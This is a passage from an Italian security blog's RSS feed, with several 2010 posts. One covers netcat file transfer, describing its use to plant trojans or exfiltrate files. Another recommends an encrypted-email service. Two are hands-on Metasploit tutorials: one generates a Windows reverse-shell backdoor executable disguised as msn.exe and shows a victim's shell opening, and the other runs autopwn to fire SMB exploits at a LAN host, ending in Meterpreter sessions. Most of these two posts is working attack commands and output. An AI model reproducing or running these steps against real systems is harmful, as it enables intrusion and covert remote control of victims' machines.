<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ago1980.wordpress.com/690/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ago1980.wordpress.com/690/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ago1980.wordpress.com/690/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ago1980.wordpress.com/690/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/ago1980.wordpress.com/690/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/ago1980.wordpress.com/690/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/ago1980.wordpress.com/690/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/ago1980.wordpress.com/690/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ago1980.wordpress.com/690/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ago1980.wordpress.com/690/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ago1980.wordpress.com/690/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ago1980.wordpress.com/690/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ago1980.wordpress.com/690/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ago1980.wordpress.com/690/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ago1980.wordpress.com&amp;blog=2504298&amp;post=690&amp;subd=ago1980&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://ago1980.wordpress.com/2010/03/23/revers-shell/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/916910d22d67e1d6d8fe1099d7e45a2f?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">ago1980</media:title>
		</media:content>
	</item>
		<item>
		<title>Netcat traferimento di file&#8230;</title>
		<link>http://ago1980.wordpress.com/2010/03/06/netcat-traferimento-di-file/</link>
		<comments>http://ago1980.wordpress.com/2010/03/06/netcat-traferimento-di-file/#comments</comments>
		<pubDate>Sat, 06 Mar 2010 20:58:39 +0000</pubDate>
		<dc:creator>ago1980</dc:creator>
				<category><![CDATA[Netcat]]></category>

		<guid isPermaLink="false">http://ago1980.wordpress.com/?p=687</guid>
		<description><![CDATA[Questa caratteristica di netcat può essere utile in diversi casi. Può essere il modo più semplice e veloce per passare file tra due computer senza dover attivare condivisioni o installare servizi. Oppure durante un penetration test o durante un’intrusione può essere molto utile portare velocemente sul computer sotto attacco  trojan, rootkit o altri strumenti; oppure [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ago1980.wordpress.com&amp;blog=2504298&amp;post=687&amp;subd=ago1980&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Questa caratteristica di netcat può essere utile in diversi casi. Può essere il modo più semplice e veloce per passare file tra due computer senza dover attivare condivisioni o installare servizi. Oppure durante un penetration test o durante un’intrusione può essere molto utile portare velocemente sul computer sotto attacco  trojan, rootkit o altri strumenti; oppure può essere necessario esfiltrare file senza lasciare tracce nei log. Un altro punto forte di questa tecnica è la diffusione di netcat sulle macchine Unix/Linux. Se si deve portare dei file su un Linux in rete senza troppi problemi si può utilizzare netcat.</p>
<p>La tecnica è abbastanza semplice: si usano due netcat, uno sulla macchina sorgente e uno sulla macchina di destinazione. Quest’ultimo avrà la funzione di server.</p>
<p>Netcat può agire come server. Questo significa che può mettersi “in ascolto” su di una porta Tcp e attendere una connessione. Per attivare questa funzione bisogna specificare sulla riga di comando il parametro -l (listen) e specificare la porta (-p):</p>
<p>nc -l -p 9999 -vv &gt; miofile</p>
<p>Questo comando mette netcat in ascolto sulla porta 9999; l’output viene reindirizzato al file miofile tramite il simbolo &gt;.</p>
<p>Questo significa che tutto quello che netcat riceverà sulla rete attraverso la porta 9999 verra memorizzato in un file di nome miofile. Sia il valore della porta (in questo caso  9999), sia il nome del file (miofile), sono arbitrari, possono essere qualsiasi cosa.</p>
<p>Mentre sul server netcat “ascolta”, sulla macchina sorgente, ovvero sulla macchina sulla quale è memorizzato il file da trasmettere al server, dovremo usare unnetcat in modalità client per inviare i dati del file da trasferire:</p>
<p>nc 127.0.0.1 9999 -vv &lt; miofile</p>
<p>Con questo comando invio il file “miofile” tramite la redirezione dell’input ottenuta con il simbolo &lt; all’host 127.0.0.1, ovvero il computer sul quale netcat è in “ascolto”, sulla porta 9999. In questo esempio ho utilizzato l’indirizzo del computer locale (127.0.0.1), ma nella realtà naturalmente l’indirizzo dovrà coincidere con l’Ip reale del computer server. Ovvero se il computer sul quale netcat è in ascolto in modalità server è 192.168.0.1, nel netcat in modalità client dovrò indicare proprio questo indirizzo.</p>
<p>Un’ultima considerazione: netcat non fornisce un indicatore di progresso del trasferimento in corso; per sapere quando il trasferimento stesso è terminato occorre controllare con il comando dir ols le dimensioni crescenti del file.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ago1980.wordpress.com/687/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ago1980.wordpress.com/687/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ago1980.wordpress.com/687/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ago1980.wordpress.com/687/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/ago1980.wordpress.com/687/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/ago1980.wordpress.com/687/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/ago1980.wordpress.com/687/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/ago1980.wordpress.com/687/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ago1980.wordpress.com/687/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ago1980.wordpress.com/687/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ago1980.wordpress.com/687/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ago1980.wordpress.com/687/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ago1980.wordpress.com/687/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ago1980.wordpress.com/687/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ago1980.wordpress.com&amp;blog=2504298&amp;post=687&amp;subd=ago1980&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://ago1980.wordpress.com/2010/03/06/netcat-traferimento-di-file/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/916910d22d67e1d6d8fe1099d7e45a2f?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">ago1980</media:title>
		</media:content>
	</item>
		<item>
		<title>Come Inviare Velocemente Email Cifrate</title>
		<link>http://ago1980.wordpress.com/2010/02/22/come-inviare-velocemente-email-cifrate/</link>
		<comments>http://ago1980.wordpress.com/2010/02/22/come-inviare-velocemente-email-cifrate/#comments</comments>
		<pubDate>Mon, 22 Feb 2010 20:54:22 +0000</pubDate>
		<dc:creator>ago1980</dc:creator>
				<category><![CDATA[Email Cifrate]]></category>

		<guid isPermaLink="false">http://ago1980.wordpress.com/?p=684</guid>
		<description><![CDATA[Viviamo in un mondo di spioni, la nostra privacy è quotidianamente minacciata da mille occhi indiscreti, occhi che scrutano le nostra mosse in Internet, pronte a carpirci ogni segreto. Saremmo disposti a spendere ogni cifra per poter preservare le nostre faccende più private. Che poi andiamo a strillare gli affaracci nostri su Facebook e Twitter [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ago1980.wordpress.com&amp;blog=2504298&amp;post=684&amp;subd=ago1980&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Viviamo in un mondo di spioni, la nostra privacy è quotidianamente minacciata da mille occhi indiscreti, occhi che scrutano le nostra mosse in Internet, pronte a carpirci ogni segreto. Saremmo disposti a spendere ogni cifra per poter preservare le nostre faccende più private. Che poi andiamo a strillare gli affaracci nostri su Facebook e Twitter (ma anche Googlr Buzz), è un altro discorso.</p>
<p>Per chi ha a cuore la sicurezza delle comunicazioni personali, suggerisco l’uso di strumenti crittografici. E’ vero però che non sempre si hanno a disposizione tools sofisticati, e a volte la controparte con la quale abbiamo la necessità di scambiare dati sensibili non è proprio una volpe informatica. Inviare un’email cifrata può non essere la più facile delle azioni.</p>
<p>Per questo ci viene in soccorso <a id="zjcq" title="lockbin.com" href="https://lockbin.com/">lockbin.com</a>. Si tratta di un servizio gratuito che permette di spedire velocemente e semplicemente messaggi cifrati e protetti da password ad un indirizzo di posta elettronica.</p>
<p>Il destinatario riceverà un link con l’indirizzo del messaggio. Cliccandolo all’utente verrà presentata la richiesta della password. Una volta inserita la password corretta, il destinatario sarà in grado di leggere il messaggio e di rispondere al mittente. Una volta letto il messaggio si autodistruggerà.</p>
<p>Tutto questo è sicuro? Si, no forse. Il sito non eccede in trasparenza, non parla di metodi e di algoritmi usati; diciamo che qui c’è da mettere in risalto la semplicità dell’approccio. Probabilmente la trasmissione di segreti preziosi necessita di strumenti più affidabili e collaudati.</p>
<p>Prima di concludere una parola sulla password: si tratta di un segreto condiviso; nella miglior tradizione della crittografia simmetrica deve essere conosciuto a priori dalle parti coinvolte nella comunicazione, o deve essere trasmesso su di una linea, se non sicura, almeno alternativa (telefono, sms, segnali di fumo…)</p>
<p>fonte:pillolhacking</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ago1980.wordpress.com/684/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ago1980.wordpress.com/684/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ago1980.wordpress.com/684/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ago1980.wordpress.com/684/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/ago1980.wordpress.com/684/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/ago1980.wordpress.com/684/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/ago1980.wordpress.com/684/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/ago1980.wordpress.com/684/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ago1980.wordpress.com/684/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ago1980.wordpress.com/684/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ago1980.wordpress.com/684/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ago1980.wordpress.com/684/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ago1980.wordpress.com/684/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ago1980.wordpress.com/684/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ago1980.wordpress.com&amp;blog=2504298&amp;post=684&amp;subd=ago1980&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://ago1980.wordpress.com/2010/02/22/come-inviare-velocemente-email-cifrate/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/916910d22d67e1d6d8fe1099d7e45a2f?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">ago1980</media:title>
		</media:content>
	</item>
		<item>
		<title>Creare una Backdoor con metasploit</title>
		<link>http://ago1980.wordpress.com/2010/02/13/creare-una-blakdoor-con-metasploit/</link>
		<comments>http://ago1980.wordpress.com/2010/02/13/creare-una-blakdoor-con-metasploit/#comments</comments>
		<pubDate>Sat, 13 Feb 2010 23:17:41 +0000</pubDate>
		<dc:creator>ago1980</dc:creator>
				<category><![CDATA[Creare una Blakdoor con metasploit]]></category>

		<guid isPermaLink="false">http://ago1980.wordpress.com/?p=677</guid>
		<description><![CDATA[È possibile usare, da riga di comando, il tool msfpayload per generare payloads da utilizzarsi in molti contesti ed offre una gran varietà di opzioni di output, come ad esempio uno specifico formato eseguibile. Possiamo ad esempio generare un eseguibile Windows di tipo reverse shell che si riconnetta a noi sulla porta 31337 (msfpayload opera [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ago1980.wordpress.com&amp;blog=2504298&amp;post=677&amp;subd=ago1980&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>È possibile usare, da riga di comando, il tool msfpayload per generare payloads da utilizzarsi in molti contesti ed offre una gran varietà di opzioni di output, come ad esempio uno specifico formato eseguibile.</p>
<p>Possiamo ad esempio generare un eseguibile Windows di tipo reverse shell che si riconnetta a noi sulla porta 31337 (msfpayload opera come msfcli nel senso che si può appendere la lettera “O” al termine della stringa di comando, per vedere quali opzioni siano disponibili).</p>
<p><code># cd /opt/metasploit3/msf3<br />
# ./msfpayload windows/shell_reverse_tcp O</code></p>
<pre>       Name: Windows Command Shell, Reverse TCP Inline
    Version: 7075
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 314
       Rank: Normal

Provided by:
  vlad902
  sf 

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process
LHOST                      yes       The local address
LPORT     4444             yes       The local port

Description:
  Connect back to attacker and spawn a command shell</pre>
<p><code><br />
# ./msfpayload windows/shell_reverse_tcp LHOST=192.168.1.10 LPORT=31337 X &gt;/tmp/msn.exe<br />
Created by msfpayload (http://www.metasploit.com).<br />
Payload: windows/shell_reverse_tcp<br />
Length: 314<br />
Options: LHOST=192.168.1.101,LPORT=31337<br />
# file /tmp/mata_hari.exe<br />
/tmp/mata_hari.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit<br />
# ls -l /tmp/msn.exe<br />
-rw-r--r-- 1 root root 37888 2010-01-11 12:31 /tmp/msn.exe<br />
</code><br />
Ora che abbiamo ottenuto il nostro eseguibile (e prima che qualcuno lo mandi in esecuzione), dovremo usare il modulo ‘multi/handler’, che serve a gestire gli exploits lanciati esternalmente al framework.<br />
<code><br />
# ./msfconsole<br />
[...]<br />
msf &gt; use exploit/multi/handler<br />
msf exploit(handler) &gt;<br />
</code><br />
Quando si utilizza il modulo “exploit/multi/handler”, occorre ancora specificare quale sia il payload da attendersi e su quale porta attendere, per cui andranno impostate con gli stessi parametri dell’eseguibile precedentemente generato<br />
<code><br />
msf exploit(handler) &gt; set payload windows/shell/reverse_tcp<br />
payload =&gt; windows/shell/reverse_tcp.<br />
msf exploit(handler) &gt; set LHOST 192.168.1.101<br />
LHOST =&gt; 192.168.1.101<br />
msf exploit(handler) &gt; set LPORT 31337<br />
LPORT =&gt; 31337<br />
msf exploit(handler) &gt; exploit<br />
[*] Started reverse handler on port 31337</code><br />
<code><br />
[*] Starting the payload handler…<br />
</code><br />
vediamo cosa succede nel caso in cui una vittima mandi in esecuzione il file precedentemente generato.<br />
<code><br />
[*] Sending stage (240 bytes)<br />
[*] Command shell session 1 opened (192.168.1.10:31337 -&gt; 192.168.1.253:1049)</code><br />
<code><br />
Microsoft Windows XP [Versione 5.1.2600]<br />
(C) Copyright 1985-2001 Microsoft Corp.</code><br />
<code><br />
C:\Documents and Settings\ago\Documenti\Download&gt;</code></p>
<p>Il modulo multi/handler ha gestito l’ exploit e ci presenta una shell..</p>
<span style="text-align:center; display: block;"><a href="http://ago1980.wordpress.com/2010/02/13/creare-una-blakdoor-con-metasploit/"><img src="http://img.youtube.com/vi/a-4bRFa2usY/2.jpg" alt="" /></a></span>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ago1980.wordpress.com/677/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ago1980.wordpress.com/677/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ago1980.wordpress.com/677/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ago1980.wordpress.com/677/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/ago1980.wordpress.com/677/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/ago1980.wordpress.com/677/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/ago1980.wordpress.com/677/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/ago1980.wordpress.com/677/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ago1980.wordpress.com/677/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ago1980.wordpress.com/677/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ago1980.wordpress.com/677/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ago1980.wordpress.com/677/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ago1980.wordpress.com/677/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ago1980.wordpress.com/677/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ago1980.wordpress.com&amp;blog=2504298&amp;post=677&amp;subd=ago1980&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://ago1980.wordpress.com/2010/02/13/creare-una-blakdoor-con-metasploit/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/916910d22d67e1d6d8fe1099d7e45a2f?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">ago1980</media:title>
		</media:content>
	</item>
		<item>
		<title>Automazione di penetration con Metasploit Autopwn</title>
		<link>http://ago1980.wordpress.com/2010/02/12/automazione-di-penetration-con-metasploit-autopwn/</link>
		<comments>http://ago1980.wordpress.com/2010/02/12/automazione-di-penetration-con-metasploit-autopwn/#comments</comments>
		<pubDate>Fri, 12 Feb 2010 17:42:57 +0000</pubDate>
		<dc:creator>ago1980</dc:creator>
				<category><![CDATA[Metasploit Autopwn]]></category>

		<guid isPermaLink="false">http://ago1980.wordpress.com/?p=674</guid>
		<description><![CDATA[Con l’obiettivo di automatizzare la fase del penetration testing, a partire dalla versione 3, Metasploit offre un modulo chiamato “autopwn” che è in grado di automatizzare la fase di exploit di un penetration test. Sebbene autopwn sia ben lontano dall’essere perfetto, fa un lavoro decente nell’ exploit di molteplici hosts. Un punto di forza di [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ago1980.wordpress.com&amp;blog=2504298&amp;post=674&amp;subd=ago1980&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Con l’obiettivo di automatizzare la fase del penetration testing, a partire dalla versione 3, Metasploit offre un modulo chiamato “autopwn” che è in grado di automatizzare la fase di exploit di un penetration test.</p>
<p>Sebbene autopwn sia ben lontano dall’essere perfetto, fa un lavoro decente nell’ exploit di molteplici hosts.</p>
<p>Un punto di forza di autopwn consiste nella capacità di importare dati relativi a vulnerabilità da files NBE di Nessus o da output Nmap XML, interessante feature che funziona bene. Inoltre, si può eseguire Nmap dall’interno della console di Metasploit ed essa archivierà i risultati nel database. Infine, si possono lanciare exploits relativi a porte, servizi o vulnerabilità in base ai dati importati.</p>
<p>Limitazioni di autopwn</p>
<p>Autopwn ha alcune limitazioni, intanto necessita di un database MySQL, Sqlite, oppure Postgres. Alcuni dei prerequisiti sono RubyGems, active record (parte di ruby on rails), ed il database correttamente configurato per operare con autopwn. Anche in termini di payloads si è piuttosto limitati. Sfortunatamente con la corrente versione si può usare una bind shell di base come payload.</p>
<p>Se state cercando modi fantasiosi per ottenere reports dei vostri dati dovrete arrangiarvi un po’, dato che non vi è alcun meccanismo di reporting automatizzato in autopwn. Si raccommenda di eseguire il comando “script” da una shell prima di avviare msfconsole. Non è possibile fare molto utilizzando la GUI o la web console di Metasploit, ad eccezione di screen shots,</p>
<p>Metasploit 3 utilizza per default il supporto al database SQLite. Sebbene sia funzionale, problemi di performance non lo rendono adatto alla automazione di exploits su larga scala.<br />
<code><br />
msf &gt; help<br />
Database Backend Commands<br />
=========================</code><br />
<code><br />
Command        Description<br />
-------        -----------<br />
db_connect     Connect to an existing database<br />
db_create      Create a brand new database<br />
db_destroy     Drop an existing database<br />
db_disconnect  Disconnect from the current database instance<br />
db_driver      Specify a database driver</code><br />
<code><br />
msf &gt;  db_driver<br />
[*]    Active Driver: sqlite3<br />
[*]        Available: sqlite3<br />
[...]<br />
</code><br />
Una volta che il plugin sia stato caricato, digitate il comando db_create.<br />
<code><br />
msf &gt; db_create<br />
[*] Creating a new database instance…<br />
[*] Successfully connected to the database<br />
[*] File: /root/.msf3/sqlite3.db<br />
</code><br />
Ora che la console è connessa ad una nuova istanza di database, a set arricchito di comandi da console diviene subito disponibile. Essi vengono elencati nell’output del comando “help” sotto la sezione Database Backend.<br />
<code><br />
Database Backend Commands<br />
=========================</code><br />
<code><br />
Command               Description<br />
-------               -----------<br />
db_add_host           Add one or more hosts to the database<br />
db_add_note           Add a note to host<br />
db_add_port           Add a port to host<br />
db_autopwn            Automatically exploit everything<br />
db_connect            Connect to an existing database<br />
db_create             Create a brand new database<br />
db_del_host           Delete one or more hosts from the database<br />
db_del_port           Delete one port from the database<br />
db_destroy            Drop an existing database<br />
db_disconnect         Disconnect from the current database instance<br />
db_driver             Specify a database driver<br />
db_hosts              List all hosts in the database<br />
db_import_amap_mlog   Import a THC-Amap scan results file (-o -m)<br />
db_import_nessus_nbe  Import a Nessus scan result file (NBE)<br />
db_import_nessus_xml  Import a Nessus scan result file (NESSUS)<br />
db_import_nmap_xml    Import a Nmap scan results file (-oX)<br />
db_nmap               Executes nmap and records the output automatically<br />
db_notes              List all notes in the database<br />
db_services           List all services in the database<br />
db_vulns              List all vulnerabilities in the database<br />
db_workspace          Switch between database workspaces</code><br />
<code><br />
msf &gt;<br />
</code><br />
Per verificare che la connessione al database sia valida, eseguite il comando db_hosts. Se tutto funziona correttamente, non vi saranno risultati e neppure errori.</p>
<p>La console è connessa al database, lo schema è predisposto, ed ora si è pronti ad importare i dati relativi alle vulnerabilità. La attuale versione del framework supporta gli output files Nessus NBE, gli output files Nmap XML, ed un command wrapper (db_nmap) che lancerà il port scanner nmap ed archiviare i risultati nel database collegato.</p>
<p>Prima di iniziare a caricare dati, diamo una veloce occhiata al comando db_autopwn. Eseguendolo senza alcun parametro, restituisce il seguente output:<br />
<code><br />
msf &gt; db_autopwn<br />
[*] Usage: db_autopwn [options]<br />
-h          Display this help text<br />
-t          Show all matching exploit modules<br />
-x          Select modules based on vulnerability references<br />
-p          Select modules based on open ports<br />
-e          Launch exploits against all matched targets<br />
-r          Use a reverse connect shell<br />
-b          Use a bind shell on a random port (default)<br />
-q          Disable exploit module output<br />
-R  [rank]  Only run modules with a minimal rank<br />
-I  [range] Only exploit hosts inside this range<br />
-X  [range] Always exclude hosts inside this range<br />
-PI [range] Only exploit hosts with these ports open<br />
-PX [range] Always exclude hosts with these ports open<br />
-m  [regex] Only run modules whose name matches the regex<br />
</code></p>
<p>Il comando db_autopwn esaminerà le tabelle del database e creerà una lista di moduli che corrispondono a specifiche vulnerabilità. Tale processo di ricerca di corrispondenze può avvenire in due differenti modi. Il primo metodo è “cross-referencing” ed è piuttosto accurato. Il secondo metodo usa la porta per default associata con ciascun modulo exploit per individuare targets operanti il servizio medesimo. Anche se funziona nella maggior parte dei casi, è probabile che trascuri servizi vulnerabili operanti su porte non di default.</p>
<p>A questo punto, avete una serie di opzioni. Potete sia importare un esistente Nessus NBE file tramite il comando db_import_nessus_nbe, importare un esistente Nmap XML output file tramite il comando db_import_nmap_xml, oppure usare il comando db_nmap per populare il database. Il vantaggio di usare un Nessus NBE file è che fornisce dati per la modalità cross-referencing (-x) di db_autopwn. Il vantaggio di usare dati Nmap consiste nel fatto che si può velocemente attaccare un ampio gruppo di sistemi senza dover operare un completo vulnerability scan, ma trascurereste vulnerabilità che non si trovano sulla porta di default del modulo Metasploit associato.</p>
<p>Occorre avere ben presente che il comando db_autopwn tratterà tutti i records presenti nel database come potenziali targets. Future versioni del framework avranno la capacità di limitare i targets ad un set specifico dell’intero database. NON importate nel database alcunchè non siate autorizzati a violare.</p>
<p>Come primo tentativo, cerchiamo, usando il comando db_nmap, di prendere di mira una macchina Windows XP nella rete locale.<br />
<code><br />
msf &gt; db_nmap 192.168.1.253 -O --reason</code><br />
<code><br />
Starting Nmap 5.00 ( http://nmap.org ) at 2009-12-29 00:01 CET<br />
Interesting ports on 192.168.1.253:<br />
Not shown: 995 closed ports<br />
Reason: 995 resets<br />
PORT     STATE SERVICE      REASON<br />
23/tcp   open  telnet       syn-ack<br />
135/tcp  open  msrpc        syn-ack<br />
139/tcp  open  netbios-ssn  syn-ack<br />
445/tcp  open  microsoft-ds syn-ack<br />
3389/tcp open  ms-term-serv syn-ack<br />
MAC Address: 08:00:27:01:2A:E6 (Cadmus Computer Systems)<br />
Device type: general purpose<br />
Running: Microsoft Windows 2000|XP|2003<br />
OS details: Microsoft Windows 2000 SP2 - SP4, Windows XP SP2 - SP3, or Windows Server 2003 SP0 - SP2<br />
Network Distance: 1 hop</code><br />
<code><br />
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .<br />
Nmap done: 1 IP address (1 host up) scanned in 16.51 seconds<br />
</code><br />
Una volta che questo comando sia stato completato, usate il comando db_services per osservare i risultati.<br />
<code><br />
msf &gt; db_services</code><br />
<code><br />
Services<br />
========</code><br />
<code><br />
created                    info  name  port  proto  state  Host           Workspace<br />
-------                    ----  ----  ----  -----  -----  ----           ---------<br />
2009-12-29 00:02:03 +0100              23    tcp    open   192.168.1.253  default<br />
2009-12-29 00:02:03 +0100              135   tcp    open   192.168.1.253  default<br />
2009-12-29 00:02:03 +0100              139   tcp    open   192.168.1.253  default<br />
2009-12-29 00:02:03 +0100              445   tcp    open   192.168.1.253  default<br />
2009-12-29 00:02:03 +0100              3389  tcp    open   192.168.1.253  default<br />
</code></p>
<p>Ora è il momento di eseguire il comando db_autopwn e vedere quali moduli lancerà. Eseguite il seguente comando dal prompt della console:<br />
<code><br />
msf &gt; db_autopwn -p -e -R great<br />
[*] (1/16 [0 sessions]): Launching exploit/solaris/telnet/fuser against 192.168.1.253:23…<br />
[*] (2/16 [0 sessions]): Launching exploit/solaris/telnet/ttyprompt against 192.168.1.253:23…<br />
[*] (3/16 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.253:139…<br />
[*] (4/16 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.253:139…<br />
[*] (5/16 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.253:139…<br />
[*] Job limit reached, waiting on modules to finish…<br />
[*] (6/16 [0 sessions]): Launching exploit/windows/smb/msdns_zonename against 192.168.1.253:139…<br />
[*] (7/16 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.1.253:139…<br />
[*] (8/16 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.1.253:139…<br />
[*] (9/16 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.1.253:139…<br />
[*] Job limit reached, waiting on modules to finish…<br />
[*] (10/16 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.253:445…<br />
[*] Meterpreter session 1 opened (192.168.1.10:50510 -&gt; 192.168.1.253:34152)<br />
[*] Job limit reached, waiting on modules to finish…<br />
[*] (11/16 [1 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.253:445…<br />
[*] (12/16 [1 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.253:445…<br />
[*] (13/16 [1 sessions]): Launching exploit/windows/smb/msdns_zonename against 192.168.1.253:445…<br />
[*] (14/16 [1 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.1.253:445…<br />
[*] Job limit reached, waiting on modules to finish…<br />
[*] (15/16 [1 sessions]): Launching exploit/windows/smb/psexec against 192.168.1.253:445…<br />
[*] Job limit reached, waiting on modules to finish…<br />
[*] (16/16 [1 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.1.253:445…<br />
[*] (16/16 [1 sessions]): Waiting on 5 launched modules to finish execution…<br />
[*] Meterpreter session 2 opened (192.168.1.10:54367 -&gt; 192.168.1.253:21538)<br />
[*] (16/16 [2 sessions]): Waiting on 2 launched modules to finish execution…<br />
[*] (16/16 [2 sessions]): Waiting on 1 launched modules to finish execution…<br />
[*] (16/16 [2 sessions]): Waiting on 1 launched modules to finish execution…</code><br />
<code><br />
msf &gt;<br />
</code><br />
Il flag -p in base alle corrispondenze port-based dovrebbe elencare una serie di exploits per ogni sistema target.<br />
Il flag -e indica invece che ognuno dei moduli venga lanciato contro tale target.<br />
Il flag -R si riferisce invece al cosidetto “exploit ranking”. Il parametro sta ad indicare quanto affidabile sia l’exploit, e istruisce ad utilizzare solamente exploits col rank indicato (o superiore), riducendo fortemente le probabilità che la macchina target o un particolare servizio vadano in crash.</p>
<p>Validi rank sono “excellent”, “great”, “good”, “normal”, “average”, “low” e “manual”.<br />
Il comando seguente è in grado di indicare tutti i moduli catalogati “great” o superiore:<br />
<code><br />
msf &gt; search -r great<br />
[...]<br />
</code><br />
Dalla console, la opzione globale MinimumRank può venire adoperata per prevenire l’eventualità che vengano lanciati per errore degli exploit con un ranking inferiore a quanto desiderato:<br />
<code><br />
